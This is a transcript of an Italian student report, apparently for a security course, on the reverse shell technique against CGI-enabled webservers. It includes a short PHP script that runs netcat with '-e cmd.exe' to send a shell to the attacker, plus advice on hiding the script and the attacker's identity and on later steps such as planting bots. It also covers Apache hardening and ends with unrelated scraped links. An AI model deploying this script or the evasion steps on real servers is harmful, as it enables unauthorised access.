Tecnica della Reverse Shell Riccardo V. Vincelli

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Tecnica della Reverse Shell Riccardo V. Vincelli 709588 r.vincelli@campus.unimib.it"

Transcript

1 Tecnica della Reverse Shell Riccardo V. Vincelli L' obiettivo della relazione e' illustrare come sia possibile, a patto di alcune assunzioni in termini di sicurezza non troppo restrittive, avere possibilita' d' esecuzione su un webserver tramite la tecnica della shell inversa. La trattazione vuole essere anche abbastanza pratica e rispecchia perlopiu' fedelmente esperienze avute dall' autore. 1. Terminologia Con il termine shell intendiamo principalmente la seguente cosa: la possibilita' di potere utilizzare un interprete dei comandi testuale del sistema attaccato (il programma comunemente detto shell appunto), e quindi essere in grado di eseguire comandi sulla stessa macchina

2 compromessa. L' effettivo file eseguibile che l' attaccante sceglie di utilizzare, dovrebbe essere uno sul quale egli ha dimestichezza: mentre questo discorso non ha troppo senso ad esempio sui sistemi Windows, dove l' interprete dei comandi e' fondamentalmente uno, il file cmd.exe o command.com su sistemi datati, sui sistemi Unix si hanno in genere vari interpreti a disposizione e quindi la scelta non e' indifferente, anche rispetto alle tracce che l' attaccante stesso lascia: ad esempio la bash (Bourne-Again SHell, evoluzione della Bourne SHell) offre di default una funzionalita' di cronologia dei comandi digitati (salvati nel file.bash_history, visualizzabili tramite il comando history e richiamabili tramite!n, dove n e' il numero del comando cosi' come appare nell' output di history) e quindi, una volta disconnessi, un amministratore di sistema puo' andare a vedere, in teoria, scoperta la compromissione, i comandi digitati che, potenzialmente, possono anche tradire l' attaccante; riprenderemo questo discorso

3 piu' avanti. Una shell si puo' ottenere in molti modi, la tecnica in esame non e' certamente la prima ad essere stata pensata ne' sicuramente la migliore. La shell piu' ambita e', ovviamente, quella di root/administrator, identificabile nella stragrande maggioranza dei sistemi *nix dal simbolo '#', ma non e' il nostro caso, almeno nella tecnica della reverse shell cosi' com'e': sarebbe potenzialmente possibile se, per assurdo, il webserver fosse eseguito da root. Con il verbo bucare intendiamo l' avere accesso esecutivo effettivo ad un sistema,ad esempio proprio avendo la possibilita' di una shell. Il termine puo' assumere significati affini, ma raggiungere il "buco" puo' anche non significare un qualcosa di troppo straordinario: se infatti si riesce ad avere possibilita' di esecuzione su una macchina non troppo performante, ad esempio, una

4 che risulta essere spesso irraggiungibile/sconnessa o con impedimenti formali elevati, per esempio si hanno i privilegi di un utente di comodo che non puo' molto (vedi sotto), l' avere bucato un sistema non e' cosa troppo gratificante per un attaccante. La parola bot (diminutivo di robot) intende un programma automatico che, una volta eseguito, non necessita stretta supervisione, cioe' non necessita' di input utente, e fa un qualcosa che l' attaccante reputa utile. Possiamo avere molti tipi di bot: per esempio, nel mondo di IRC (Internet Relay Chat), in alcune situazioni dei programmi bot sono utilizzati per mantenere il possesso di una stanza di discussione, o ancora nei giochi online modello client-server i bot fungono da giocatori automatici o supervisori della regolarita' del gioco stesso per evitare che gli utenti usino trucchi e similia. Un uso comune che si fa di una shell e' proprio quello di installare, ed eseguire,

5 programmi del tipo. Cio' si lega principalmente a due aspetti: -il bot ha necessita' di essere sempre connesso -esistono provider che offrono possibilita' di avere processi sempre in esecuzione e sempre connessi, ma al giorno d' oggi quasi nessuno di questi offre tale servizio gratuitamente. Quindi se il buco da' esito che si rivela positivo, cioe' se l' attaccante si accorge di avere in controllo una macchina soddisfacente, una possibilita' e' certo quella, se ne ha necessita', di installare suddetti bot. Vantaggi in questo senso possono essere: -l' amministratore non si accorge della compromissione se non andando a dare un occhiata ai processi in esecuzione (in *nix, comando ps), o alle connessioni attive (comandi netstat oppure sockstat) poiche' il programma determina utilizzo di risorse limitato ed e' silenzioso. -l' attaccante risparmia qualche soldo poiche' ottiene quello che dovrebbe pagare (anche se non troppo, la media e' quella di 2.5$ a

6 processo in background e connesso, per la durata di un mese) rivolgendosi a provider in modo legale. Le possibilita' di scenari bot-related sono molte, e possono spingersi anche ad ipotesi piu' marcatamente illegali anche se (forse?) piu' rare (drone-botnet, sniffing ecc...) 2. Assunzioni/prerequisiti Quello che dobbiamo avere e' possibilita' di scrittura su una macchina che permetta di eseguire da remoto degli script di un linguaggio interpretato: nella pratica mi rifaccio all' avere un account ftp su un webserver che monti perl o php nel contesto piu' ampio dello standard CGI (Common Gateway Interface, un modo W3C-compliant di gestire contenuti dinamici per siti web); il sistema operativo dev' essere Windows o Linux/*BSD (con buona approssimazione anche altri sistemi unix non troppo desueti possono andare).

7 Inutile dire che la possibilita' di scrittura puo' essere legittima (nostro caso) o illegittima, requisito minimo e' solo mettere gli script in un luogo dove possano essere raggiunti ed eseguiti dal webserver o meglio dall' interprete (ad esempio mod_perl per il server Apache). Questo scenario, a pensarci bene, non e' nulla di raro: provider come Aruba forniscono per pochi euro un servizio di questo tipo su base annuale ed al giorno d' oggi la stragrande maggioranza dei siti internet di privati e piccole-medie imprese sono operati in questo od altri molto affini modi (non sto citando nessuna fonte ma e' un fatto abbastanza immediato a chi abbia un minimo di dimestichezza nel campo). Un altro prerequisito, banale, e' quello di avere un web browser funzionante: per fortuna per quel che ci interessa, non ci serve altro che digitare un url ed attenderne l' esecuzione (tanto per intenderci, anche un browser come Lynx va piu' che bene, ma assumiamo InternetExplorer).

8 Altri strumenti che ci servono sono un netcat ed uno script per eseguire la shell remotamente, ed un programma per ricevere, localmente, la shell inviata da remoto (a tal proposito utilizzo ancora netcat). Lo script scritto da me e' molto semplice, e netcat e' un' utility free. 3. L' attacco Lo schema dell' attacco e' abbastanza semplice, ma potente: 1. Modificare lo script: la coppia indirizzo:porta cui mandarla. Attenzione se decidiamo di mandarla ad un indirizzo riconducibile a noi! (es. il pc di casa, molto riconducibile a noi direi) 2.Caricarlo (una cartella dove siamo sicuri sia raggiungibile e' quella dove si trova anche l' index o simili corrente) 3.Caricare netcat nello stesso luogo (netcat

9 remoto) 4.Mettere in ascolto il netcat locale sulla coppia indirizzo:porta scritti nello script 5. Eseguire lo script tramite url Attenzione se decidiamo di mandare la richiesta da un indirizzo riconducibile a noi! (es. non utilizzando proxy; ricordiamo poi che browser come IE lasciano una caterva di informazioni aggiuntive!) 6. Connettersi a dove abbiamo mandato la shell. Le istruzioni le ho riscritte in inglese nello script stesso. 4. Esame dei passi 4.1. Script Lo script fornito e' stato scritto pensando di attaccare un server Windows, dove la particolare scomodita' e' la presenza di un interprete di default non avanzato che non permette d' essere usato interattivamente da remoto: questo ci costringe ad appoggiarci a netcat anche per il lato server.

10 Ho conosciuto questa tecnica circa quattro anni fa, presi dal sito degli script sia in perl sia in php che fanno la stessa cosa ma in modo piu' avanzato ed anche sicuramente piu' fine: in particolare non ci si appoggia a netcat per l' interattivita' ma all' opzione -i delle shell redirigendo gli standard input, output ed error su una socket tcp. Ai tempi, per avere un' idea statistica di massima, 4 su 5 server risultavano proni. Riprovando oggi, la situazione e' inversa, infatti l' idea di hardening rispetto alla sicurezza degli script web e' cosa comune. Codice: <?php //Synopsis: //Spawn a reverse shell through netcat in a suitable cgi php context // //Usage: //-download NetCat for your platform (the attacking one): // --if you're on linux/unix you probably already have it installed // --a win version is at

11 //-on the attacking host (your box or one you control, whose ip is say ) // put netcat in listening mode on a free port: nc -l -p // On Windows I noticed that binding to a particular address is not working // properly, so the command I suggest is always fine. //-upload the script: // --you must upload it in a directory url-reachable (ie from a browser) // --it's necessary it supports script execution too (ie cgi-bin) //-upload netcat //-execute the script (ie //-on the console you issued the listening command, // you should receive the desired shell. // //This script is lame and is intended for spawning against a win box. //If you want finer examples ncindependent for the server side and //unix-targeting check out //

12 //Bugs: //The "manual" is way longer than the code itself // //Author: //RVV - r.vincelli@campus.unimib.it $shell = 'nc.exe -v -n e cmd.exe'; exec($shell);?> Vedi "Esempio" per una dimostrazione dell' attacco Caricamento L' assunzione piu' comoda e' avere un account ftp o similia per uppare lo script in una directory raggiungibile dal webserver; ovviamente in generale e' quest' ultimo punto che ci interessa, non tanto come ci arriviamo (ftp o altro). Lo script e' un file php, testo quindi, e va inviato in modalita' ascii pertanto. Non e' generalmente necessario modificarne i permessi, ma e' auspicabile modificarne il nome in qualcosa che, se proprio non

13 inganni, quando lo legga, l' amministratore, almeno non gli sia lampante quando ci mette sopra gli occhi. Torneremo sotto sui "tempi di sopravvivenza" stimati di questo tipo di attacco Netcat Netcat (nc) e' un' utility unix portata anche a Windows soprannominata "coltellino svizzero di Internet", ed a buon diritto: puo' essere utilizzato in modo arbitrario come peer di una connessione tcp o udp, permettendo cose come modello client/server, trasferimento di dati, client raw e molte altre. Nel nostro caso ci limitiamo al comando per metterlo in ascolto: nc -l -p PORTA dove PORTA dev' essere ovviamente quella messa nello script. In un sistema Windows la porta in uso non dev' essere bloccata da firewall, in unix oltre a questo dobbiamo utilizzare, se non root (e veramente non ha senso che si sia loggati root in una situazione del genere, e piu' in generale ora non ha piu' senso essere loggati come root, esistendo utility come

14 sudo) una porta piu' alta di Esecuzione L' esecuzione si riduce al digitare l' opportuno url nel nostro browser di fiducia. Come gia' notato quest' azione, assieme all' utilizzo della shell ma anche maggiormente rispetto questa, e' una con la quale riveliamo un sacco di informazioni al webserver; non volendo entrare nel merito di browser particolari come detto sopra, la quantita' di informazioni rilasciata puo' essere valutata ad esempio all' indirizzo ; ricordando che tutti i webserver hanno una minima logging capability abilitata di default, e' un punto su cui proprio non possiamo transigere. Come noto, e' possibile utilizzare un proxy per "nascondere" l' indirizzo del browser, ma questa via non e' dopotutto il massimo perche': -non tutti i tipi di proxy sono anonimi (nel senso che inoltrano si' la connessione da parte nostra, ma comunicano la nostra identita' al webserver o mantengono log dei

15 client che servono) -di default, la funzionalita' di proxy dei browser permette di utilizzarne uno solo alla volta -i proxy sono difficili da trovare: quelli che veramente si rivelano funzionanti sono solitamente pochi ed in posti esotici (e con funzionanti intendiamo anche stabili, cioe' presenti in rete almeno per 24 ore senza troppa discontinuita'), nonche' subissati di richieste (specie se appaiono in cima a varie liste pubbliche come ); molti non sono altro che computer (spesso pc domestici) compromessi e suoi quali e' installata dal trojan/bot di turno una funzionalita' proxy, o tali in virtu' di misconfigurazioni/difetti di software applicativo (o una combinazione dei fattori: noto e' il binomio Sobig worm- Wingate v5) Un' alternativa sono fornitori di proxy/socks a pagamento (ma non ha troppo senso!). Un passo successivo in termini di ricerca d' anonimato puo' essere l' onion routing ( ). Ovviamente modi piu' sofisticati, avendo a

16 disposizione macchine esterne cui non siamo riconducibili (e che reputiamo sufficientemente insicure o "distratte" in termini di logging), sono sempre possibili: una molto in voga qualche anno fa (o meglio piu' di qualche anno fa) e' l' utilizzo di un datapipe, ossia di un piccolo programmino, in c o in perl solitamente, da eseguire sulla macchina intermediaria con principalmente tre argomenti: una porta locale su cui ascoltare in tcp, una porta ed host remoto cui mandare i dati ricevuti (una versione anche interattiva si puo' trovare a ippa_v2.txt ) Connettiamoci! Il passo finale non e' altro che connetterci dove abbiamo mandato la shell; se e' una prova o se ci fidiamo ci connetteremo a noi stessi. Pur essendo possibile riutilizzare netcat, e' molto piu' comodo il noto telnet: telnet e' un protocollo con i quali molti smanettoni hanno sicuramente confidenza, se non altro per azioni lamer ma sicuramente didattiche come provare a mandarci una mail

17 anonima o connettercisi ad IRC. 5. Concretizzazione dell' attacco Una volta dentro, dobbiamo decidere che fare; in qualsiasi caso, ci deve guidare il buonsenso. Anzitutto, avremo poteri limitati: la shell avra' i privilegi dell' utente che ha eseguito il demone http: in unix e' solitamente un utente di comodo (httpd, www, nobody ecc...), in Windows ci possiamo aspettare un utente non di default ma sicuramente non di livello amministrativo. Ricordiamo che oltre all' utilizzo di utenti di comodo, altre configurazioni di sicurezza adatte anche ad un ambiente DAC (discretionary access control) possono essere: -chrooting: un' applicazione e' "bloccata" in una sottodirectory, cioe' posta in un contesto dove ha tutti i file necessari al suo funzionamento sottoforma di hardlink ai file effettivi, e copie dei device in caso -jailing: sistema introdotto da FreeBSD che

18 prevede il partizionamento dell' os in vari sottosistemi virtuali indipendenti trasparentementemente all' utente. Notiamo che tutti queste possibilita' sono un qualcosa di nativo nei sistemi unix: per questo e per altri motivi (es. multiutenza e permessi stretti, paradigmi MAC-mandatory access control), sono da reputarsi piu' sicuri: semmai dubbi si possono avere circa la facilita' nel configurare l' ambiente adatto, e per sanare questo punto ci si puo' ad esempio aiutare con wizard grafici e con un approccio meno hardcore unix all' utilizzo dei file di configurazione (la strada presa da Mac OSX). Buonsenso e' anche rendersi conto che, comunque sia, danneggiare il sistema cancellando file su cui si hanno permessi e' deleterio: in prima battuta per una questione morale (stiamo buttando via lavoro altrui) in seconda per una pratica; un admin che si accorge di essere stato "battuto" ma non rileva danni, puo' pigramente prendere nota dell' accaduto e dimenticarsene (ecco magari non troppo pigramente, dovrebbe cercare di

19 capire come l' attaccante e' entrato!). Ma nel caso in cui abbia problemi di sorta, ad esempio un cliente del provider che possiede il webserver si ritrova lo spazio web interamente cancellato, inattivo per del tempo, e la colpa finisce sull' admin, puo' magari mettersi a spulciare, termine non correttissimo visto che esiste software che agevola il processo, i log di sistema e provare a non farla passare liscia all' attaccante. Posto che non facciamo nessuna azione che ci renda visibili (cancellazioni gratuite o anche defacciamenti dei siti), ci chiediamo ora come fare per rimanere piu' a lungo possibile invisibili (o nascosti bene) agli occhi dell' admin. La tecnica della reverse shell dovrebbe essere un punto di partenza e non di arrivo: non abbiamo in casi normali grossi privilegi e siamo dipendenti da uno script. Settarlo nascosto e "nasconderlo" in sottocartelle puo' aiutare, tutto dipende dalla frequenza con cui il sito internet e'

20 aggiornato ma soprattutto da come: se per assurdo il webmaster o chi per esso usano solo cms (content management systems) e non danno mai un occhio alla webroot per esempio via ftp, ci sono buone possibilita' per noi in questo senso, giusto per citare uno scenario. Se la vediamo appunto come partenza, il passo successivo e' ottenere quel che vogliamo dal sistema nel miglior modo possibile; e con cio' comprendiamo un range di possibilita' vasto, su cui soffermarsi sarebbe troppo lungo: nascondiamo in /tmp (dove sicuramente abbiamo accesso in scrittura) il bot che vogliamo eseguire, o iniziamo a cercare in rete un exploit locale per ottenere la root? In questa fase generalmente non possiamo prescindere dal sistema in uso, in un livello di dettaglio anche abbastanza alto: ad esempio se siamo su una linux box a kernel x.y.z.-tu, dobbiamo cercare un qualcosa appositamente per quel kernel. E' quasi impossibile trovare exploit potenti locali che sfruttino componenti native del

21 sistema come kernel, librerie famose ecc; paga molto di piu' cercare di isolare la presenza di software applicativi particolari sul sistema, ad esempio associati a servizi, e cercare attacchi per questi. Meglio ancora se proprietari o di vendor non famosissimi: in questi casi il codice quasi sicuramente chiuso facilita un eventuale successo. Certo, se l' attaccante e' veramente di alto livello, puo' contare sugli zeroday: ma questo e' un altro discorso. 6. Cure e prevenzioni Come d' obbligo, bisogna anche mettersi nei panni dell' admin: poniamo che si accorga della compromissione del sistema, cosa dovrebbe fare? La risposta e' valida in senso generale e possiamo astrarla dall' attacco particolare della reverse shell: -cercare file e processi sospetti e cancellarli, terminarli -esaminare i log di sistema ed applicativi -isolare le componenti che potrebbero nascondere la falla

22 -documentarsi circa vulnerabilita' note su queste (CVE, BugTraq, siti vendor ecc) -confrontarsi con altri colleghi -arrivare ad una soluzione E' curioso come molte volte siano gli attaccanti stessi a tendere una mano agli amministratori di sistema suggerendo la vulnerabilita' da essi sfruttata o addirittura fornendo una patch. Per le prevenzioni invece possiamo portarci piu' nello specifico proprio rispetto alla reverse shell; queste sono solo alcune delle possibili vie Disabilitare gli interpreti in questione/rinunciare alla common gateway interface: se non c'e' modo di interpretare gli script, essi ovviamente sono innocui; e' una soluzione drastica che puo' non essere accettabile se la tecnologia cgi e' parte integrante dell' uso comune del nostro webserver. Come abbiamo spesso riflettuto in aula, una risposta del tipo e' una risposta efficace ma e' un po' un' ultima spiaggia. Un' altra soluzione molto piu' logica puo'

23 essere configurare opportunamente quel che si puo' fare e non, in termini di script! Mi rifaccio ad una situazione cgi su Apache: Apache e' infatti il webserver piu' comune e tra i piu' sicuri; analoghe prevenzioni si possono avere sull' IIS di Microsoft, che sta cercando di colmare il gap ma non puo' certo contare su una community come quella di Apache. Abbiamo: httpd.conf/.htaccess httpd.conf e' il file di configurazione principale di Apache, l' abilitazione ed il settaggio del cgi passano da qui. Possiamo permettere l' esecuzione di script cgi (in un qualsiasi linguaggio adatto) in vari modi: -direttiva ScriptAlias: le directory che la seguono sono indicate al server come le uniche che in un url possono prevedere l' interpretazione di uno script; se ad esempio ho:...

24 ScriptAlias /cgibin/... l' url non determina una richiesta a buon fine dato che la cartella non e' tra quelle indicate. -direttiva Options:... <Directory /usr/local/apache2/htdocs/somedir> Options +ExecCGI </Directory>... che pero' richiede anche di specificare le estensioni d' interesse (differentemente dal modo con ScriptAlias che intende tutti i file nelle directory specificate come potenziali script):... AddHandler cgi-script.cgi.pl... Con queste indicazioni, evitando di lasciare agli utenti cartelle abilitate agli script dove ne possano mettere di loro, si raggiunge un buon livello di sicurezza. In caso in cui si voglia portare questo cgi

25 hardening ma non si abbia accesso al httpd.conf, si possono utilizzare, nei limiti definiti nel httpd.conf stesso, i file.htaccess, che non sono altro che override di quest' ultimo cui effetto e' sulla cartella in cui si trovano e tutte le sottocartelle (ad esempio ha senso metterne uno nella webroot) Controllare i file caricati E' possibile pensare ad un processo che verifichi direttamente il contenuto dei file nell' albero directory ed agisca di conseguenza: se in una cartella mi aspetto solo immagini, elimino i file che non lo sono; se in un' altra mi aspetto solo codice html, non mi basta verificare l' estensione, ma vado alla ricerca di pattern (es. #!/usr/bin/perl) in base a cui elimino file dannosi; e' possibile anche pensare ad un report program. Un semplice script del potente ambiente shell puo' essere: #!/bin/sh while true; do for file in * do a=$(file $file)

26 b=$file": PHP script text" c=$file": perl script text executable" if test "$a" = "$b" then rm -f $file elif test "$a" = "$c" then rm -f $file fi; done done dove in pratica, per ogni file nella directory dove lo script e' eseguito, se ne verifica il tipo tramite l' utility file, e se e' di tipo php o perl, lo si elimina; lo script e' semplice anche se ha come punti delicati l' assegnamento dell' output di un comando ad una variabile (costrutto $(command)) e la concatenazione di due stringhe (variabili $b e $c); attenzione anche al quoting (utilizzando '' al posto di "" abbiamo errore perche' le variabili non sono valutate). Lo script e' da posizionare nelle directory sensibili; ovviamente si possono avere script piu' complessi ad esempio che prendono l' input delle estensioni trigger da un file e controllano una lista di directory prefissata, ecc. E' preferibile eseguirlo in background (posponendo la &) e regolarne l' esecuzione in startup (ad esempio via cron).

27 Non dimentichiamo che uno script del genere puo' essere utilizzato anche su ambiente Windows: essendo il batch scripting piu' debole, si puo' talvolta pensare all' uso di ambienti d' emulazione ad-hoc come Cygwin Rinominare i file Questo metodo e' abbastanza debole se adottato in un sistema in cui l' utente attaccante ha accesso di lettura e scrittura pieno, ma buono se percaso l' utente puo' solo fare upload senza avere la possibilita' di vedere il contenuto della cartella dove carica file; cambiando il nome dei file (es. attraverso hashing), l' attaccante non sara' piu' in grado di formulare un trigger url valido; non si applica al nostro scenario dove abbiamo assunto possibilita' ftp equivalenti. 7. Conclusioni L' attacco della shell inversa ha sicuramente una sua importanza didattica, poiche' tocchiamo vari argomenti: dall' ambiente di shell ai linguaggi di scripting.

28 In termini di efficacia effettiva non e' forse esaltante: anche quando si riesca a caricare con successo, ed a fare in modo che non venga cancellato, nei limiti del possibile, lo script, le incognite sono rappresentate dal poter eseguire l' interprete dei comandi, ed il doversi fermare, almeno in prima battuta, a privilegi bassi. Piu' in generale sfruttare l' "aiuto" degli linguaggi interpretati e' una modalita' d' attacco applicata anche sotto altri nomi, e citiamo tra gli altri: SQL injection: l' attacco consiste nel presentare in una query sql dati arbitrari opportunamente scritti. Scenario tipico e' quello di un file html contenente il form ed un file in un linguaggio interpretato (es. php) incaricato di interfacciarsi col dbms per inoltrare effettivamente l' interrogazione. In caso di controlli deboli dal lato server, sono possibili situazioni di autenticazione senza credenziali ma sullo stesso paradigma e' possibile pensare anche ad arrivare alla shell

29 se il dbms espone comandi opportuni (es. "esegui comando locale"). La reverse shell e' attacco in linea generale aperto se non ai lamer nella gerarchia degli smanettoni, almeno ai kiddie: infatti le conoscenze da avere sono veramente poche ed il ritocco del codice banale (parametri host e porta): script del tipo e' suggerito modificarli leggermente (es. cancellazione d' una parentesi) per scoraggiare proprio gli utenti infimi prima di rilasciarli in the wild, anche se solo come proof of concept, che in fin dei conti non e' altro che termine eufemismo per exploit. 8. Esempio Provo ad instaurare l' attacco da macchina Windows ad un' altra ancora Windows, premettendo che sono entrambe mie, collegate in lan in modo diretto. L' ambiente web e' rappresentato, per quel che c' interessa, dal server web Apache con

30 mod_php abilitato; in particolare per fare piu' in fretta con la configurazione, ed anche perche' e' solo un esempio, ho optato per binari preconfigurati e precompilati con IndigoAMPP della software house IndigoStar. Inutile dire che scelte del tipo sono fondamentalmente sbagliate nel caso dell' allestimento di un server vero e proprio. La documentazione ufficiale Apache poi e' esauriente circa l' installazione del webserver in ambiente Windows, anche se l' ambiente di riferimento naturale e' certamente uno di stampo unix. La webroot; evidenziati i file d' attacco nc e script:

31 In ascolto sulla macchina attaccante:

32 Esecuzione dello script:

33 La shell e' arrivata! Notiamo che l' ultimo comando e' un comando dal basso buonsenso!

34 9. Webografia/link utili

Il web server Apache Lezione n. 3. Introduzione

Il web server Apache Lezione n. 3. Introduzione Procurarsi ed installare il web server Apache Introduzione In questa lezione cominciamo a fare un po di pratica facendo una serie di operazioni preliminari, necessarie per iniziare a lavorare. In particolar

Dettagli

Il Web Server e il protocollo HTTP

Il Web Server e il protocollo HTTP Corso PHP Parte 2 Il Web Server e il protocollo HTTP E un programma sempre attivo che ascolta su una porta le richieste HTTP. All arrivo di una richiesta la esegue e restituisce il risultato al browser,

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

3. Installare Wamp Server

3. Installare Wamp Server E107 WEB SYSTEM Corso on line di progettazione siti dinamici: livello base R E A L I Z Z A Z I O N E D I 3. Installare Wamp Server By e107 Italian Team Sito web:http://www.e107italia.org Contatto: admin@e107italia.org

Dettagli

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox.

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox. Oggi parlerò di qualcosa che ha a che fare relativamente con la tecnica fotografica, ma che ci può dare una mano nella gestione dei nostri archivi digitali, soprattutto nel rapporto professionale con altre

Dettagli

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15 Entrare in un pc è una espressione un po generica...può infatti significare più cose: - Disporre di risorse, quali files o stampanti, condivise, rese fruibili liberamente o tramite password con i ripettivi

Dettagli

Manuale per la configurazione di AziendaSoft in rete

Manuale per la configurazione di AziendaSoft in rete Manuale per la configurazione di AziendaSoft in rete Data del manuale: 7/5/2013 Aggiornamento del manuale: 2.0 del 10/2/2014 Immagini tratte da Windows 7 Versione di AziendaSoft 7 Sommario 1. Premessa...

Dettagli

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti 20120300 INDICE 1. Introduzione... 3 2. Consultazione... 4 2.1 Consultazione Server Fidati... 4 2.2 Consultazione Servizi Client... 5 2.3 Consultazione Stato richieste... 5 3. Amministrazione... 6 3.1

Dettagli

GENERALE. Cos è la rete IRC? Differenza tra Mirc e DeXdcc?

GENERALE. Cos è la rete IRC? Differenza tra Mirc e DeXdcc? F.A.Q. DeXdcc - Versione 1.0 GENERALE Cos è la rete IRC? IRC (Internet Relay Chat) è uno dei sistemi che ha spinto la comunicazione tramite Internet, serve per chattare in tempo reale e condividere files

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

Client - Server. Client Web: il BROWSER

Client - Server. Client Web: il BROWSER Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare

Dettagli

INSTALLAZIONE JOOMLA

INSTALLAZIONE JOOMLA INSTALLAZIONE JOOMLA Moltissime volta mi capita (e penso capiti anche a voi) di dover prima di pubblicare un sito farlo vedere al cliente per l ok finale, o magari doverlo fare vedere, ma non avere ancora

Dettagli

Volume GESTFLORA. Gestione aziende agricole e floricole. Guidaall uso del software

Volume GESTFLORA. Gestione aziende agricole e floricole. Guidaall uso del software Volume GESTFLORA Gestione aziende agricole e floricole Guidaall uso del software GESTIONE AZIENDE AGRICOLE E FLORICOLE Guida all uso del software GestFlora Ver. 2.00 Inter-Ware Srl Viadegli Innocenti,

Dettagli

Laboratorio di Sistemi Programmare in Php con NetBeans Php. Programmare in Php con Xampp e NetBeans IDE

Laboratorio di Sistemi Programmare in Php con NetBeans Php. Programmare in Php con Xampp e NetBeans IDE Programmare in Php con Xampp e NetBeans IDE NetBeans è un IDE ben noto ai programmatori Java. Con esso si possono infatti costruire applicazioni desktop professionali dotate di interfaccia grafica, applicazioni

Dettagli

ARCHIVIA PLUS VERSIONE SQL SERVER

ARCHIVIA PLUS VERSIONE SQL SERVER Via Piemonte n. 6-6103 Marotta di Mondolfo PU tel. 021 960825 fax 021 9609 ARCHIVIA PLUS VERSIONE SQL SERVER Istruzioni per configurazione sql server e conversione degli archivi Versione n. 2011.09.29

Dettagli

Database. Si ringrazia Marco Bertini per le slides

Database. Si ringrazia Marco Bertini per le slides Database Si ringrazia Marco Bertini per le slides Obiettivo Concetti base dati e informazioni cos è un database terminologia Modelli organizzativi flat file database relazionali Principi e linee guida

Dettagli

Il software di gestione immobiliare più facile da usare. Modulo Web v5.2. www.gestim.it

Il software di gestione immobiliare più facile da usare. Modulo Web v5.2. www.gestim.it Il software di gestione immobiliare più facile da usare Modulo Web v5.2 www.gestim.it Introduzione Il Modulo Web è un componente di Gestim che permette di pubblicare in automatico gli annunci sul sito

Dettagli

Come modificare la propria Home Page e gli elementi correlati

Come modificare la propria Home Page e gli elementi correlati Come modificare la propria Home Page e gli elementi correlati Versione del documento: 3.0 Ultimo aggiornamento: 2006-09-15 Riferimento: webmaster (webmaster.economia@unimi.it) La modifica delle informazioni

Dettagli

2.1 Installazione e configurazione LMS [4]

2.1 Installazione e configurazione LMS [4] 2.1 Installazione e configurazione LMS [4] Prerequisti per installazione su server: Versione PHP: 4.3.0 o superiori (compatibilità a php5 da versione 3.0.1) Versione MySql 3.23 o superiori Accesso FTP:

Dettagli

Reti di Telecomunicazione Lezione 7

Reti di Telecomunicazione Lezione 7 Reti di Telecomunicazione Lezione 7 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Il protocollo Programma della lezione file transfer protocol descrizione architetturale descrizione

Dettagli

sito web sito Internet

sito web sito Internet Siti Web Cos è un sito web Un sito web o sito Internet è un insieme di pagine web correlate, ovvero una struttura ipertestuale di documenti che risiede, tramite hosting, su un web server e accessibile

Dettagli

risulta (x) = 1 se x < 0.

risulta (x) = 1 se x < 0. Questo file si pone come obiettivo quello di mostrarvi come lo studio di una funzione reale di una variabile reale, nella cui espressione compare un qualche valore assoluto, possa essere svolto senza necessariamente

Dettagli

Console di Amministrazione Centralizzata Guida Rapida

Console di Amministrazione Centralizzata Guida Rapida Console di Amministrazione Centralizzata Contenuti 1. Panoramica... 2 Licensing... 2 Panoramica... 2 2. Configurazione... 3 3. Utilizzo... 4 Gestione dei computer... 4 Visualizzazione dei computer... 4

Dettagli

Mac Application Manager 1.3 (SOLO PER TIGER)

Mac Application Manager 1.3 (SOLO PER TIGER) Mac Application Manager 1.3 (SOLO PER TIGER) MacApplicationManager ha lo scopo di raccogliere in maniera centralizzata le informazioni piu salienti dei nostri Mac in rete e di associare a ciascun Mac i

Dettagli

Corso di PHP. Prerequisiti. 1 - Introduzione

Corso di PHP. Prerequisiti. 1 - Introduzione Corso di PHP 1 - Introduzione 1 Prerequisiti Conoscenza HTML Principi di programmazione web Saper progettare un algoritmo Saper usare un sistema operativo Compilazione, link, esecuzione di programmi Conoscere

Dettagli

COME AVERE SUCCESSO SUL WEB?

COME AVERE SUCCESSO SUL WEB? Registro 3 COME AVERE SUCCESSO SUL WEB? Guida pratica per muovere con successo i primi passi nel web MISURAZIONE ED OBIETTIVI INDEX 3 7 13 Strumenti di controllo e analisi Perché faccio un sito web? Definisci

Dettagli

Database e reti. Piero Gallo Pasquale Sirsi

Database e reti. Piero Gallo Pasquale Sirsi Database e reti Piero Gallo Pasquale Sirsi Approcci per l interfacciamento Il nostro obiettivo è, ora, quello di individuare i possibili approcci per integrare una base di dati gestita da un in un ambiente

Dettagli

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress Copyright Andrea Giavara wppratico.com Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress 1. Il pannello amministrativo 2. I dati importanti 3. Creare il database - Cpanel - Plesk

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste

